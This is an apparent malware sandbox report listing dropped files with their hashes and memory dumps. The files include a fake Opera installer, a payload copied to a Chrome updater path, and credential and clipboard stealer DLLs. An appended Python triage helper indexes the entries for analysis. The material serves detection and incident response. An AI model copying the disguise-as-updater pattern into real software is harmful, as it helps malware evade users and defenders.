MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/2396-99-0x00000000750D0000-0x0000000075880000-memory.dmp

C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

C:\Users\Admin\AppData\Local\Temp\Opera_installer_231004220045510568.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

memory/568-192-0x0000000000750000-0x0000000000C9D000-memory.dmp

memory/1640-193-0x00000000750D0000-0x0000000075880000-memory.dmp

memory/2772-194-0x00000000007C0000-0x00000000007C1000-memory.dmp

memory/1640-195-0x00000000050A0000-0x00000000050B0000-memory.dmp

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200476662204.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 194455d6a083a49127653d277622d086
SHA1 4eb3a18929ca48c39439d4ab69b8b6a732244f9b
SHA256 98e0b866ae0549464cc8bd33d4054f2f996cf72dde6d138135bf4d2002ab41b0
SHA512 0b85d81d174f0d4d8bbb7c2c913a0042597225ce3eec816bc6c85f5eae68fab25b7ef81f8756ed3e8070528786a059ab38d77e54eb99240f5c56d7db8f97a61e

memory/2396-220-0x00000000750D0000-0x0000000075880000-memory.dmp

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

memory/2204-227-0x0000000000320000-0x000000000086D000-memory.dmp

memory/2036-230-0x0000000000320000-0x000000000086D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200482442036.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/1236-234-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp

memory/540-235-0x0000000000400000-0x000000000046A000-memory.dmp

memory/3032-238-0x0000000003700000-0x0000000003831000-memory.dmp

memory/4332-239-0x0000000000320000-0x000000000086D000-memory.dmp

memory/3032-237-0x0000000003580000-0x00000000036F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/2772-245-0x0000000000400000-0x0000000000513000-memory.dmp

memory/4200-248-0x0000000000320000-0x000000000086D000-memory.dmp

memory/3396-247-0x00000221C1CB0000-0x00000221C1D34000-memory.dmp

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 f749f169456bf05f8a0c6b25c6e5160e
SHA1 c84a50b43a018ec3eaaa1c1f9722d510d8a9672a
SHA256 92f97b77b52b79b25d3a7b04aff3c1a09e74524a63b7872c69a18fabcb9767c3
SHA512 34c87436d4c0855beca5c659b87c24c45347f3a22e8e98cf823f45ab6370d26369041b9b8bae991862a1b176703c7d03ba8b43e0853c6c09cdb9e8b404c2f639

memory/3396-256-0x00000221C3890000-0x00000221C38F2000-memory.dmp

memory/2396-261-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3396-260-0x00000221DC1A0000-0x00000221DC1FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 6e3efda28f9423dc58e7273a7462f593
SHA1 ca4bccdc7e1e1d53461f3c8edd2e35590fd24222
SHA256 18bcfc151e790026f17189a06e8b02bdcb086164f8e88c785e7b11405cc566fb
SHA512 d9720d6cf5338223baa5705eb9a43e8b34898b64d5c30743b48cce92692cc62984e9222fc172fe455fe1ea22b82e9a4cdedb6d6fce2242a57c5849e31f883b15

memory/3396-269-0x00000221DC480000-0x00000221DC490000-memory.dmp

memory/3396-268-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

memory/1236-274-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 6e3efda28f9423dc58e7273a7462f593
SHA1 ca4bccdc7e1e1d53461f3c8edd2e35590fd24222
SHA256 18bcfc151e790026f17189a06e8b02bdcb086164f8e88c785e7b11405cc566fb
SHA512 d9720d6cf5338223baa5705eb9a43e8b34898b64d5c30743b48cce92692cc62984e9222fc172fe455fe1ea22b82e9a4cdedb6d6fce2242a57c5849e31f883b15

C:\Users\Admin\AppData\Local\Temp\926387074340

MD5 7425846ffb4decd1f4967054515410b4
SHA1 babe08bd4ee569d669fbc6dbe6e17c4d66a1a7b3
SHA256 0bb84e8070d50739964d9c394fff6469c69fa9005b264a20156e58d7ca3b9afa
SHA512 dbf90794775d63a8b0480699736b86b854e95cf62c7500e6f5e1ac7df5699c92f72d3b4be3347be881ea7477330aa82625cdcd0413cb0e1378d79f21fa18c2e0

memory/2396-286-0x0000000006400000-0x000000000692C000-memory.dmp

memory/3948-288-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

memory/3948-290-0x0000019A55500000-0x0000019A55510000-memory.dmp

memory/3948-291-0x0000019A55500000-0x0000019A55510000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5x3pdke.ccn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3948-297-0x0000019A6DCC0000-0x0000019A6DCE2000-memory.dmp

memory/2396-302-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3948-305-0x0000019A55500000-0x0000019A55510000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

memory/5140-342-0x0000000001040000-0x0000000001050000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

memory/5140-344-0x000000006D6B0000-0x000000006DC61000-memory.dmp

memory/2096-347-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3032-349-0x0000000003700000-0x0000000003831000-memory.dmp

memory/5140-352-0x000000006D6B0000-0x000000006DC61000-memory.dmp

memory/3396-348-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/5248-354-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

memory/3948-355-0x0000019A55500000-0x0000019A55510000-memory.dmp

memory/2096-333-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PNQH7.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2772-361-0x0000000000400000-0x0000000000513000-memory.dmp

memory/540-365-0x0000000000400000-0x000000000046A000-memory.dmp

memory/5140-372-0x000000006D6B0000-0x000000006DC61000-memory.dmp

memory/5248-392-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3948-393-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

memory/2096-394-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 6f6dacd31cba5be683dc1d7aaf884829
SHA1 270c0a13ad69d44ffdff00f2e3db62c64b80d5f7
SHA256 5d71c61ddfd9e3a0ee69a4391b4aa3341b640dab6d1ba87334932b45ec9cd110
SHA512 b28187482f59e37bb1aab75218e3888cea34823c44d37677acef81c1c574fa2af65108cb1eeaed08a0e63920ac39386ca272d308424e8f351f57886ab694c8cf

memory/2396-418-0x0000000004E80000-0x0000000004E90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/1236-424-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\additional_file0.tmp

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe

MD5 0d88834a56d914983a2fe03d6c8c7a83
SHA1 e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35
SHA256 e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53
SHA512 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbgcore.DLL

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbgcore.dll

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

memory/4616-478-0x00007FF79D2C0000-0x00007FF79D803000-memory.dmp

memory/4940-490-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

memory/4940-491-0x00000259797C0000-0x00000259797D0000-memory.dmp

memory/4940-492-0x00000259797C0000-0x00000259797D0000-memory.dmp

memory/4940-503-0x0000025979FB0000-0x0000025979FCC000-memory.dmp

memory/4940-504-0x0000025979FD0000-0x000002597A085000-memory.dmp

memory/4940-505-0x00007FF49BF90000-0x00007FF49BFA0000-memory.dmp

memory/4940-506-0x000002597A090000-0x000002597A09A000-memory.dmp

memory/4940-507-0x000002597A200000-0x000002597A21C000-memory.dmp

memory/4940-509-0x000002597A1E0000-0x000002597A1EA000-memory.dmp

C:\Windows\TEMP\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

memory/6080-524-0x00000000003D0000-0x00000000003F0000-memory.dmp

memory/4616-525-0x00007FF79D2C0000-0x00007FF79D803000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

memory/6044-544-0x00007FF6F0040000-0x00007FF6F0053000-memory.dmp

memory/6080-545-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp

memory/6080-551-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp

memory/6080-560-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YQR9M4BX\s54[1].htm

MD5 e1671797c52e15f763380b45e841ec32
SHA1 58e6b3a414a1e090dfc6029add0f3555ccba127f
SHA256 3f79bb7b435b05321651daefd374cdc681dc06faa65e374e38337b88ca046dea
SHA512 87c568e037a5fa50b1bc911e8ee19a77c4dd3c22bce9932f86fdd8a216afe1681c89737fada6859e91047eece711ec16da62d6ccb9fd0de2c51f132347350d8c
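The following is an added example, not part of the sandbox report or its tooling, that ingests entries in the format of the Files list above and pulls out what a triage analyst wants from such a list: a deduplicated index keyed by SHA256, the same bytes dropped under more than one path (in this report the executable written to the user's Pictures folder reappears as C:\Program Files\Google\Chrome\updater.exe with identical hashes), entries whose digests match an empty or single-byte body (the code derives those digests with hashlib at run time rather than hard-coding them), and the memory-dump regions with their PID and size. The sample input is a constructed excerpt copied from the entries above with the SHA512 lines omitted for brevity; the parser accepts SHA512 lines when present.

```python
"""Triage helper for a sandbox report's Files list (path followed by MD5/SHA1/SHA256/SHA512 lines,
with memory/<pid>-<event>-0x<start>-0x<end>-memory.dmp entries mixed in)."""
import hashlib
import re
from collections import defaultdict

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_LINE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<event>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

# Constructed sample: entries copied from the report's Files list, SHA512 lines left out.
SAMPLE = r"""
C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e

memory/4616-478-0x00007FF79D2C0000-0x00007FF79D803000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YQR9M4BX\s54[1].htm

MD5 e1671797c52e15f763380b45e841ec32
SHA1 58e6b3a414a1e090dfc6029add0f3555ccba127f
SHA256 3f79bb7b435b05321651daefd374cdc681dc06faa65e374e38337b88ca046dea
"""


def parse_files(text):
    """Return one {'path': str, 'hashes': {label: hexdigest}} record per entry, in report order.
    Any non-empty line that is not a hash line starts a new record (file paths and memory dumps)."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            current["hashes"][m.group(1)] = m.group(2).lower()
        else:
            current = {"path": line, "hashes": {}}
            records.append(current)
    return records


def index_by_sha256(records):
    """Collapse repeated entries: one key per SHA256 with the set of paths that content was written to."""
    index = defaultdict(set)
    for rec in records:
        sha = rec["hashes"].get("SHA256")
        if sha:
            index[sha].add(rec["path"])
    return dict(index)


def find_masquerades(index):
    """Content dropped under more than one name or location (a copy placed under a vendor path, say)."""
    return {sha: sorted(paths) for sha, paths in index.items() if len(paths) > 1}


def trivial_bodies():
    """Digests (MD5, SHA1, SHA256) of the empty body and of every single-byte body, computed here."""
    table = {}
    bodies = [(b"", "empty file")] + [(bytes([b]), f"single byte 0x{b:02x}") for b in range(256)]
    for body, desc in bodies:
        for algo in ("md5", "sha1", "sha256"):
            table[hashlib.new(algo, body).hexdigest()] = desc
    return table


def flag_trivial(records, table=None):
    """Map path -> description for entries whose listed digest is that of a trivial body."""
    table = table or trivial_bodies()
    flagged = {}
    for rec in records:
        for digest in rec["hashes"].values():
            if digest in table:
                flagged[rec["path"]] = table[digest]
                break
    return flagged


def memory_regions(records):
    """Decode memory-dump entries into pid, event number, start address and region size."""
    regions = []
    for rec in records:
        m = MEM_LINE.match(rec["path"])
        if m:
            start, end = int(m["start"], 16), int(m["end"], 16)
            regions.append({"pid": int(m["pid"]), "event": int(m["event"]),
                            "start": start, "size": end - start})
    return regions


if __name__ == "__main__":
    recs = parse_files(SAMPLE)
    idx = index_by_sha256(recs)
    print(f"{len(recs)} entries, {len(idx)} distinct hashed files")
    for sha, paths in find_masquerades(idx).items():
        print("same content at multiple paths:", sha[:16], paths)
    for path, why in flag_trivial(recs).items():
        print("trivial body:", why, path)
    for r in memory_regions(recs):
        print(f"pid {r['pid']} event {r['event']} 0x{r['start']:X} size 0x{r['size']:X}")
```

The trivial-body check matters for the cached `s54[1].htm` entry: a one-byte server reply is a beacon acknowledgement, not a payload, so it should not go into a block list as if it were a dropped file. The masquerade check is the one to feed into a hunt, since the SHA256 is the same wherever the file lands while the path under Program Files is what an analyst would otherwise overlook.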